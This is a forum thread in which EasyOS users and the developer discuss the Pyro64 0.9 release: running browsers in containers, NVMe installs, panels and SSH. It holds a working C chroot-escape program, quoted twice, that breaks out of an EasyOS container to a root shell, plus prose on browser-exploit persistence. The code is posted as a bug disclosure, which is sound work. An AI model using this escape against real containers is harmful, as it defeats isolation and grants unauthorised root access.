EasyOS version 2.3.2, June 22, 2020

[rufwoof]

Hi all,

Speaking of Seamonkey and browsers, has anyone gotten ANY other browser to work properly in a Container? I've tried Palemoon, Firefox, Chromium and Chrome, and not one of them will run properly in a Container. They'll run as user and/or as root (depending on browser), but not in a Container for any of them.

I mentioned this problem back in Easy 0.6, and I still cannot lick it. Is it because I run Easy as a "frugal-install"? I mean, the browsers would work in a Container if I did a "full" install to a USB and/or SD Card??

Anyway, in "frugal" mode, no matter how many times I install a browser, then use Easy to set the Container up, which it says it does, that browser is NOT running in a Container.

Wish I could figure it out...

I have written that one into my to-do list!

There was a problem reported earlier, that if you install a package, say a PET, it will not run in a container.
Only those apps that are builtin to the q.sfs will run in a container.

I plan to fix this in the next release.

A container is a simple aufs layered filesystem, with q.sfs on the bottom, and a read-write layer, just a folder, on the top layer.
Hence, the only apps available to run are those in the q.sfs.

There are various possible ways to fix this. The one I am thinking of using, is to convert the installed package, say firefox, into a SFS file, say firefox.sfs, and inserting that as a middle layer in the container.

This can be done automatically when the container is created.

0.9 - I opened up the container version of console that's on the desktop by default, ran sakura terminal and changed the font size by right clicking the window so I had a better sized view, ran ppm and updated that, then searched for firefox and installed that via ppm, ran firefox & from the sakura terminal window and I'm running firefox now as I post this. A old version Firefox ESR 45.9, but definitely working inside a container for me. Just to be sure I was actually running inside the container I opened the normal desktop console and ran which firefox and that came back empty.

[rufwoof]

Inside a container terminal session and tried mounting a HDD ... denied despite being root. Also tried busybox mount and that failed as well. gparted however and I could change the first partitions label from within the container and just to be sure I changed it back again using the standard (non container) gparted.

Presumably the mount request blocks are just software based barriers, copy across a alternative for instance I guess would circumvent those barriers.

[Billtoo]

Easy Pyro64 0.9 with the radeon driver does a better job (no
tearing,flicker,etc) of streaming video than Xubuntu 18.04 Beta2 does
(so far).
Screenshot shows hd mp4 player on the left screen and a streaming CBC
TV program (in Palemoon) on the right screen, both are playing sound..

video-info-glx 1.5.3 Tue 17 Apr 2018 on Easy Pyro64 0.9 Linux 4.14.32 x86_64
0.0 VGA compatible controller: Advanced Micro Devices,
Inc. [AMD/ATI] Redwood PRO [Radeon HD 5550/5570/5630/6510/6610/7570]
oem: ATI ATOMBIOS
product: REDWOOD 01.00

X Server: Xorg Driver: radeon
X.Org version: 1.19.1
dimensions: 3840x1080 pixels (1013x285 millimeters)
depth of root window: 24 planes

direct rendering: Yes
server glx vendor string: SGI
server glx version string: 1.4
OpenGL vendor string: X.Org
OpenGL renderer string: Gallium 0.4 on AMD REDWOOD (DRM 2.50.0 / 4.14.32, LLVM 3.9.1)
OpenGL version string: 2.1 Mesa 17.0.7

Thanks.

[tigs]

My "C" (windows 10) drive is a NVMe drive, any way carv a part out of that to install easy? Right now, I can't write partition on the NVMe. Even if I can, I wonder whether that will work as a data drive.

Thanks for suggestion re booting the SD with a reader. I don't like to have someting dangling or protruding out of my laptop. I just wanted to utilized the slot. My laptop has 3 internal drives already, 2 nvmes and 1 data. I am currently using the data to boot the easy. It is working well. I just don't know how to get it to work with the nvme drive.

PS: Once I created the two partitions following Barry's instruction, the C drive will become un-bootable.

[rufwoof]

Hi Barry

0.9 sfs download of devx sfs attempt resulted in a really ... really wide message saying no-can-do due to insufficient space (it said something to the effect that the file was 300MB or so whereas free space was "only" 600MB, so it correctly identified that there was sufficient space, but just didn't want to download it).

That aside, I downloaded the devx sfs and set bootloader to load it and then compiled the following exit-chroot

Code: Select all

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);  
    for(x = 0; x < 1000; x++) chdir("..");
    chroot(".");  
    return execl("/bin/sh", "-i", NULL);
}

Compiled it and set the permission to executable and when run inside a container results in exit out of chroot to the 'standard/normal' level (all system wide files/folders available with root permission to access those).

Pyro 0.9 amd executable attached (actual .gz file, so unzip it first).

EDIT : see also http://murga-linux.com/puppy/viewtopic. ... 58#1003058

[stemsee]

It is working well on my Atom cherrytrail tablet. Bluetooth connected to my headphones first attempt ... however the same headphone was listed/found a dozen times and counting ...seems to be in a non-excluding loop.

Is there a script to upgrade the kernel? I did it manually to 4.16.1, by unsquashing q.sfs and adding flat contents of kernel-modules.sfs ... is there a technical reason they are not in initrd.q?

Touchscreen is working well, but no right click yet.

Keeps locking up on my 5 series i7 lenovo laptop. with 16gb ram. Could be the usb 2 dongle it boots from. Further tests required.

But the prospect of roll back and forward, easy share and overlayfs or aufs, outweighs teething problems.

The tutorial blogs are a great help, and easy read. Would make a nice eBook.

First install to a usb 2 stick was using dd, then installed to a populated usb 3 stick manually. Both work fine, booting in legacy mode.

Restarting X takes longer than I am used to.

cheers!

[rufwoof]

There was a problem reported earlier, that if you install a package, say a PET, it will not run in a container.
Only those apps that are builtin to the q.sfs will run in a container.

I plan to fix this in the next release.

A container is a simple aufs layered filesystem, with q.sfs on the bottom, and a read-write layer, just a folder, on the top layer.
Hence, the only apps available to run are those in the q.sfs.

There are various possible ways to fix this. The one I am thinking of using, is to convert the installed package, say firefox, into a SFS file, say firefox.sfs, and inserting that as a middle layer in the container.

This can be done automatically when the container is created.

That does seem to be the obvious way to go, perhaps along with not deprecating spot but instead including a option to chroot using a setuid of spot into the container. That way the user would have to 'request' root to add programs to the container (i.e. outside of the container root finds/builds/add a sfs) and the user would be locked in (as running as spot) to the standard file permissions and other restrictions (wouldn't for instance be able to exit-chroot or change /etc/hosts ...etc.). Similarly if a browser breakout did occur inside a container i.e. remote hacker in effect had a cli prompt running on the inside (behind firewall) that was sending out requests asking for which command(s) to run next, then that would be contained to just the container (even more so if su or any other root access were prohibited inside containers that had been initiated with setuid spot).

The Dogs have apt2sfs type scripts that download packages and produce a sfs. Chroot with setuid is also relatively straight forward. Simplest solution IMO.

[BarryK]

0.9 - I opened up the container version of console that's on the desktop by default, ran sakura terminal and changed the font size by right clicking the window so I had a better sized view, ran ppm and updated that, then searched for firefox and installed that via ppm, ran firefox & from the sakura terminal window and I'm running firefox now as I post this. A old version Firefox ESR 45.9, but definitely working inside a container for me. Just to be sure I was actually running inside the container I opened the normal desktop console and ran which firefox and that came back empty.

That's great!

I wondering about the possibilities of the console-in-a-container, and it is good that you are exploring it.

[BarryK]

My "C" (windows 10) drive is a NVMe drive, any way carv a part out of that to install easy? Right now, I can't write partition on the NVMe. Even if I can, I wonder whether that will work as a data drive.

Thanks for suggestion re booting the SD with a reader. I don't like to have someting dangling or protruding out of my laptop. I just wanted to utilized the slot. My laptop has 3 internal drives already, 2 nvmes and 1 data. I am currently using the data to boot the easy. It is working well. I just don't know how to get it to work with the nvme drive.

PS: Once I created the two partitions following Barry's instruction, the C drive will become un-bootable.

Good that you have a NVMe drive!

Well, good for testing anyway. Booted Easy from usb/sdcard, do the NVMe partitions show up as icons on the desktop?

If so, are you able to mount them?

If you type "probepart -m" in a terminal, do the NVMe partitions show as expected? It would be good to post the output here for us to see.

[BarryK]

Hi Barry

0.9 sfs download of devx sfs attempt resulted in a really ... really wide message saying no-can-do due to insufficient space (it said something to the effect that the file was 300MB or so whereas free space was "only" 600MB, so it correctly identified that there was sufficient space, but just didn't want to download it).

That aside, I downloaded the devx sfs and set bootloader to load it and then compiled the following exit-chroot

Code: Select all

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);  
    for(x = 0; x < 1000; x++) chdir("..");
    chroot(".");  
    return execl("/bin/sh", "-i", NULL);
}

Compiled it and set the permission to executable and when run inside a container results in exit out of chroot to the 'standard/normal' level (all system wide files/folders available with root permission to access those).

Pyro 0.9 amd executable attached (actual .gz file, so unzip it first).

Yeah. There are many other security settings for a container, I only ticked a couple of them. I need to revisit this area.

If you are running, say, Firefox, in a container, I don't know how the existence of a utility such as exit-chroot can be used.

The risk is from someone remote. Say sshd is running in a container, remote person logs in, I would think that anything that breaks out of the container would also kill the sshd session.

There is another thing to think about. I have considered another level of security. There is another pre-created container named 'ssh0', that is used by EasyShare.

For file transfers with EasyShare, using sshfs, not using Samba, the ssh login chroots into the container, as user "rover". rover has hardly any rights.

I did mention rover here:

http://bkhome.org/easyshare/easyshare-s ... aring.html

Something to think about, rover could be setup as default on all containers.

[rufwoof]

If you are running, say, Firefox, in a container, I don't know how the existence of a utility such as exit-chroot can be used.

Older browsers have their vulnerabilities published along with descriptions of the fixes. Some of those include execution of code vulnerabilities ... so a hacker knows where to focus their efforts to potentially exploit anyone who is running a older/unpatched browser. Outbound internet traffic is rarely monitored as are the returns from those outbound requests, so if a breach can install into memory even a small module that simply loops send-requests to the hackers IP and execute whatever command is returned, the hacker in effect has bypassed the firewall. Something like exit-root is just one of the things that might be tried, along with a barrage of others such as scanning around the LAN to see what other devices/systems might be available to have persistent code installed. Imagine a browser flaw that enabled installation into memory of a wget file from hacker site, execute that file in background ... looping type script sending the standard and error outputs out as further http requests ...

I strive to change my user-agent as revealing your browser version and operating system is a great aid in assisting towards targeted exploits. Faking your user-agent can vastly reduce the chances of a initial penetration (wrong exploits/code that wont work thrown at you). Only running root at the console (not under X) is yet another risk reduction choice. The entire 'nix file structure and permissions are geared to security utmost in mind. As are other barriers such as W^X (write exclusive or execute i.e. memory space restricted to being write only or execute only, not both), randomisation (so the structure of memory space changes rather than following a consistent pattern), Pledge (applications assigned sets of things that they are permitted to do, but prevented from accessing command/files outside of that) ...etc.

Security isn't just your data/PC, but anyone and anything else sharing the same LAN.

[belham2]

If you are running, say, Firefox, in a container, I don't know how the existence of a utility such as exit-chroot can be used.

Older browsers have their vulnerabilities published along with descriptions of the fixes. Some of those include execution of code vulnerabilities ... so a hacker knows where to focus their efforts to potentially exploit anyone who is running a older/unpatched browser......

Security isn't just your data/PC, but anyone and anything else sharing the same LAN.

This confuses me. A lot of us rip samba (or any file sharing service) out of our puppies/ddogs, also erect a firewall that automatically blocks cifs/rpc/rsync/rdp/ssh/telnet/ftp/smtp and (if applicable) NetBIOS, along with routers (and its firewall) that is even more hardened than this.

Thus, in a setup like this, just how, when, where and why would it matter what browser you are running? Any hacker will be stymied at every stop trying to execute anything in memory, coming out of the browser. And if you are 100% in ram, with daily reboots, it's game over for anyone trying to come in through memory (and a browser). Plus, any looping process by a hacker installed memory applet will be hugely noticeable in how the cpu is acting.

Containers (and not just in Barry's Easy) emulate and/or help in this process a lot, so I am stumped here at the reasoning....

[rufwoof]

This confuses me. A lot of us rip samba (or any file sharing service) out of our puppies/ddogs, also erect a firewall that automatically blocks cifs/rpc/rsync/rdp/ssh/telnet/ftp/smtp and (if applicable) NetBIOS, along with routers (and its firewall) that is even more hardened than this.

Which blocks inbound. There are no firewalls on outbound. The objective for a hacker is to get that first outbound going, as the system will treat that as a outbound request and allow both that and the returned content/reply through.

Thus, in a setup like this, just how, when, where and why would it matter what browser you are running?

Because a 'faulty' browser might enable things to be loaded into memory and in effect the instruction pointer directed to that. If say you visit a malicious web site and view the content, the content of a image file for instance could include instruction code - do something, jump 20 forward for the next instruction and do that instruction, jump 30 forward ... etc. In other words a program that YOU downloaded into memory. Looked at as just a image and that image might look totally normal, or it might not even be seen, just downloaded along with html instructions to size the display of that image to being just one pixel. The tricky part for hackers is getting the instruction pointer to point to the very first instruction of their program, a faulty browser (or other such) exploit opens up the potential for that.

Any hacker will be stymied at every stop trying to execute anything in memory, coming out of the browser. And if you are 100% in ram, with daily reboots, it's game over for anyone trying to come in through memory (and a browser).

After initialisation of a program ... a lot can happen very quickly. A open window even a few seconds can be more than enough time. Having penetrated even most briefly most hacks will look around for potential means to remain persistent one way or another. Having root/full access to disk/devices etc. makes finding such a option more likely compared to running restricted.

Plus, any looping process by a hacker installed memory applet will be hugely noticeable in how the cpu is acting.

Only if the program is permitted to run away wildly, most hackers would consider that and adjust their programs accordingly. We are after all talking in very simplistic terms here, in practice things are way more complex. Big data for instance where even allowing sites to see what OS, browser, screen resolution ... etc you are using ... along with other measures can enable you to be individually identified (or at least into a sub-set group of limited numbers).

[rufwoof]

Bug list as usual with Puppy, way way too long.

Jwm and Rox are a great partnership but Puppy destroys that.

One example, add a rox panel to the top of screen and no matter what it will be covered by maximised windows, even if you set rox to leave space for the panel, or other associated settings (remain on top ..etc.).

Desktop drive icons if you set to be further up to allow for a larger tray - reset. Desktop icons, remove them and they reappear (I prefer the convenience of dropping icons into the rox panel so you can drag/drop there instead of having to showdesktop to drag to a desktop icon). Use jwm desk setup to edit jwm and add another jwm tray to the left say (I prefer Dock to be over there and have a bottom panel that auto hides and shows menu and tasklist), and Puppy decides to rearrange all that to how it thinks it should be arranged (that doesn't work). Bloat of all the gui's to tweak this and that simply ruin things. Far better to learn a bit of XML syntax and have just a few links to the relevant files (.jwmrc etc.) in which you can 'code' all of your startup commands and configuration. Usable only if you strip out much of the bloat.

But that's all aside from Pyro 0.9. Only issue I've found so far is that if you move a container to the rox panel and remove the desktop icon, it reappears on the dektop again at the next reboot. But again that's not Pyro but Puppy.

Something odd with seamonkey font size settings. Had super small fonts initially but after playing around with UserChrome.css both in the outside and inside of containers I got that settled.

UTC wasn't set by default so the first time I setup the clocks in my other boots were all out by a hour.

Pyro wise I've tried multiple creation/deletions/restores etc. and all seems to work well. I've mostly used terminal containers and just built and run things inside each container, running rox and seamonkey etc. and that's all worked well. Did try running as spot but that didn't work (nobody permissions on the spot folder).

Concept seems to be working well. Particularly like the introduction (simple/third part) text about containers, found the first two technical text documents to be a bit too glazing.

[rufwoof]

A workaround trick with a rox panel having maximised windows covering it is to create a second jwm tray using jwmdesk manager and put that for instance over to the far top right and then create a rox panel of the same height/background colour.

I set the bottom (main panel) to be central and autohide, increasing its height and just left the MENU, showdesktop, tasklist and xload in that tray. The top right tray I set to show the date and dock.

The rox panel (rest of top of screen) now remains visible when a window is maximised, and being a rox panel you can drag/drop files onto those icons (or use the middle mouse button to drag/move to rearrange those icons). Adding a icon to the panel is also just drag and drop

[rufwoof]

This looks interesting xchroot http://www.elstel.org/xchroot/, saves on trying to get xhost localhost:0 type X redirections going between the standard pyro and the container

I changed spot password to one I'd know

passwd spot
spot
spot

I edited /usr/sbin/chroot so as to use xchroot instead of busybox chroot

and then created a sakura container

ec-chroot sakura

... which xchroot'd into a sakura session ... as root.

I then created a simple script ....

#!/bin/sh
login
exit

chmod +x that script and ran it. When prompted to login I logged in as spot (using the spot password I had set earlier).

Running leafpad and up popped the x-window for leafpad

chroot not allowed. Type exit and the exit after the login command in the above script has it disconnect from the container session.

I've messed around with things so much that my current version of pyro is untidy so I'm going to re dd another fresh copy and see if can repeat the above in the same manner.

Conceptually whilst logged into a cli in the container I should be able to install firefox via PPM and then login as spot and run that ... at least that's my thought-train.

[rufwoof]

ssh/ssh-gui not X forwarding

I have a BSD server behind my main Virgin Hub (ISP providers router) that serves as my my server. I also have netsurf installed on that headless system. Another routers WAN connects to that Virgin Hubs WAN and all other PC's/systems connect to that second router i.e. LAD isolation.

More usually I ssh -XC user@192.168.1.x from one of the 10.0.0.x PC's that are behind the second router and then run netsurf and X is forwarded correctly i.e. a browser window is shown. echo $DISPLAY from the ssh cli typically shows localhost:10 or whatever. However using Pyro and both ssh and ssh-gui with X forward option selected show a empty $DISPLAY so running anything X over ssh doesn't work (xcalc, xedit, netsurf ..etc for instance just shows cannot open display).

Yes i did try turning off the firewall etc. And to confirm I did manage to ssh X using Lucid 525 that I used to post this).

[BarryK]

I've messed around with things so much that my current version of pyro is untidy so I'm going to re dd another fresh copy and see if can repeat the above in the same manner.

One thing that needs to be improved, is the reFind boot menu, for UEFI-firmware PCs.

You have to press the F2 key to bring up a submenu, and then there is the option to "rollback".

Firstly, the sub-menu is not obvious, and I should really see if those items can be placed on the main menu.

Secondly, "rollback" actually wipes the read-write layer entirely (the .session folder), going back to a pristine first-bootup situation.
The description in the menu doesn't really state that.

Anyway, you could use that option to wipe everything, without having to do another install.

But it doesn't remove the containers, you would have to use the Container Manager to delete them.

[BarryK]

Guys,
I am not being very responsive to feedback right now, will get onto it soon.

Currently working on getting many old "puppy apps" to compile with aarch64 (64-bit arm) on my fork of OpenEmbedded.

Blog post:
http://bkhome.org/news/201804/first-oe- ... dates.html

Was very pleased this morning, when got 'gwhere' to compile. This is a very old gtk2 app, that has been in the pups from the early days, and I still have it in Easy/Quirky -- though, have no idea if anyone uses it!

Unfortunately, might have to retire inkscapelite. I got it to compile, for aarch64 in OE, and x86_64 in Easy -- but in latter case it crashed at startup.
The binary compile for April Quirky, in T2, still works.
Could trace it at startup, but more inclined to let it RIP.

What got me thinking about aarch64, is Google announced that Android will be all-64-bit by 2020, or something like that.

[stemsee]

I have just used EasyShare to connect on a public encrypted AP with my HP cherrytrail tablet and Panasonic Lumix FZ82 (4k bridge camera) to transfer files from camera to Easy-OS. Only one problem encountered - in the samba setup gui it does not mention that username must be specified from the other end, which is 'root'. Then connected and sent from the camera to the shared folder/directory. Great! Next time I will try direct connection and report.